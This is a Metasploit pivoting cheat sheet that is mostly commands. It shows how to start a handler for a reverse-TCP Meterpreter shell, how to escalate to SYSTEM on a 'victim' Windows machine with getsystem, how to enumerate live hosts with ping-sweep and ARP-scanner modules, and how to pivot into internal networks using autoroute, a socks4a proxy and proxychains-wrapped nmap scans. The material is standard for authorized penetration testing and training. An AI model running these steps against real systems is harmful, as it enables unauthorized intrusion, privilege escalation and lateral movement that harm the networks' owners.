# **Pivoting\_Cheatsheet**

#### **Using Metasploit to listen:**

```
msf > use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <Local Host IP>
set LPORT <Local Port>
exploit
```

### **Windows Privilege Escalation:**

To gain privilege in a Windows system, execute the following commands and you should gain NT Authority / SYSTEM in the victim's machine.

```
1- getuid
```

- 2- getsystem
- 3- getuid

#### To find Live Hosts:

To find live hosts we can execute one of the following commands below:

- ifconfig
- netstat -anu
- route list

#### More Enumeration on the network we accessed:

You can run the following command inside the meterpreter you've gained to enumerate the network.

1st way to enumerate:

run post/multi/gather/ping sweep rhosts= <Victim IP>

2nd way to enumerate:

- 1. use post/windows/gather/arp\_scanner
- 2. set session 2
- 3. set rhosts < Victim IP>/24
- 4. run
- 5. sessions

# To start pivoting across networks

run autoroute -s <victim IP/24>

#### Verifying:

We run the following command to make sure that the Network IP is added to the route table.

run autoroute -p

## Socks4a protocol:

We will use Socks4a protocol to start the server, type the following commands inside the Metasploit framework.

- 1- search socks4a
- 2- use auxiliary/server/socks4a
- 3- options
- **4-** set SRVPort --> < Local Port> --> should be the same port you typed in the /etc/proxychains4.conf file.
- 5- set Version --> <4a>
- 6- Leave SRVHost to default settings which should be 0.0.0.0
- 7- Type exploit to start the server

```
proxychains nmap --top-ports <Ports> <Victim IP>
```

- In the ports area, you can specify the ports you want searched via nmap, for example (20,21,22,80,139,445)
- In the Victim IP area, you can add an IP range, for example (10.10.10.1,2,3,4,5) or (10.10.10.1-20).

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